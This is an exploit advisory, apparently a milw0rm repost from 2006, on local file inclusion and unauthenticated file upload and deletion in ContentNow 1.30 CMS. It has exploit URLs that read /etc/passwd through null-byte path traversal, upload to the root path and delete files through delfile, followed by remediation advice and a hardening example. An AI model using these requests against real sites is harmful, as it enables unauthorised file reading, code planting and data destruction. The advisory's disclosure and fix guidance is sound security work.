
ContentNow 1.30 - Local File Inclusion / Arbitrary File Upload/Delete

Date: 13 Nov 2006
Reported by: r0ut3r
Type: exploitpack

ContentNow 1.30 has local file inclusion, arbitrary file upload, and delete vulnerabilities

Code
#####################################################################################
#                                                                                   #
#                              r0ut3r Presents...                                   #
#                                                                                   #
#                          Another r0ut3r discovery!                                #
#                                                                                   #
# ContentNow 1.30 Local File Include & Arbitrary File Upload/Delete Vulnerabilities #
#                                                                                   #
#####################################################################################
#                                                                                   #
# Software: ContentNow 1.30 Vulnerabilities                                         #
#                                                                                   #
# Vendor: http://www.contentnow.mf4k.de/                                            #
#                                                                                   #
# Released: 2006/11/13                                                              #
#                                                                                   #
# Discovered By: r0ut3r (writ3r [at] gmail.com)                                     #
#                                                                                   #
# Criticality: Highly critical                                                      #
#                                                                                   #
#####################################################################################

Local file inclusion vulnerability
------------------------------------

Vuln code:
----------
  // get/set language
  $setLang= (empty ($_GET['lang'])) ? $cnCore->getBackendLanguage() : $_GET['lang'];

  // define language
  include_once ('./language/'.$setLang.'.language.php');
  $lang= $cnLanguageArray[$setLang];

Exploit:
--------
http://localhost/cn/edit.php?lang=../../../../etc/passwd%00
http://localhost/cn/image.php?lang=../../../../etc/passwd%00
http://localhost/cn/upload.php?lang=../../../../etc/passwd%00
Probably more, never checked all files.

File Upload/Command Execution Vulnerability:
---------------------------------------------
Note: They tell you to set 777 permissions on install for certain folders.

http://localhost/cn/upload.php?path=/&cid=&type=file&single=false&folder=&lang=en
Set path to the directory location:
/ = root path

Select file, then upload it.

File Removal Vulnerability:
----------------------------
To delete files:
http://localhost/contentnow_130/cn/upload.php?path=/&cid=&type=file&folder=&lang=en&delfile=q.php&single=false
Set path to the directory location:
/ = root path
Set delfile to the file you want to delete:
q.php

More Information:
-----------------
Email: writ3r [at] gmail.com

Fix:
-----
How about some authentication?!
Only allow the upload of certain file types, depending on what you want it to be used for.

As for local file includes, work out a better way to set languages, i.e. make sure the language file included is one the CMS actually requires.
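
One way to apply both points, as an added example that is not ContentNow code and not from the original advisory: the lang value is matched against language files found on disk, and a delfile or upload name is confined to one directory. The function names, the 'en' fallback and the temporary directory layout are assumptions.

```php
<?php
// Added example, not ContentNow code. Function names, the 'en' fallback and
// the temporary directory layout below are assumptions for illustration.

// Map ?lang= to a language file that exists under $langDir. The request value
// is only compared with names read from disk, never put into the include path.
function resolve_language_file(string $langDir, ?string $requested, string $fallback = 'en'): string
{
    $available = [];
    foreach (glob($langDir . '/*.language.php') ?: [] as $file) {
        $available[basename($file, '.language.php')] = $file; // "en" => path
    }
    if (!isset($available[$fallback])) {
        throw new RuntimeException('fallback language file missing');
    }
    $key = ($requested !== null && isset($available[$requested])) ? $requested : $fallback;
    return $available[$key];
}

// Resolve ?delfile= (or an upload target) inside $baseDir. Returns null when
// the canonical path leaves $baseDir or is not a regular file.
function resolve_inside(string $baseDir, string $name): ?string
{
    if ($name === '' || strpos($name, "\0") !== false) {
        return null; // NUL bytes make realpath() throw on PHP 8
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $name);
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    return strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) === 0 ? $path : null;
}

// Constructed demo data: a throwaway tree with one language file and one upload.
$root = sys_get_temp_dir() . '/cn_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/language', 0700, true);
mkdir($root . '/files', 0700, true);
file_put_contents($root . '/language/en.language.php', "<?php \$cnLanguageArray['en'] = [];\n");
file_put_contents($root . '/files/q.php.txt', "upload\n");

var_dump(basename(resolve_language_file($root . '/language', 'en')));
var_dump(basename(resolve_language_file($root . '/language', "../../../../etc/passwd\0")));
var_dump(resolve_inside($root . '/files', 'q.php.txt') !== null);
var_dump(resolve_inside($root . '/files', '../language/en.language.php'));
```

Path confinement does not replace the authentication the advisory asks for; it only limits what an authenticated request can reach.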

Quick Fix:
----------
Setup .htaccess on cn/

Example Fix:
------------
.htaccess:
AuthName "ContentNow Fix!"
AuthType Basic
AuthUserFile /var/www/html/cn/.htpasswd
Require valid-user

This will prevent anyone from accessing this folder, which gives administrators a stopgap while an upgrade or patch is created.
If you do want to access it yourself, you had better create a .htpasswd file too.

# milw0rm.com [2006-11-13]
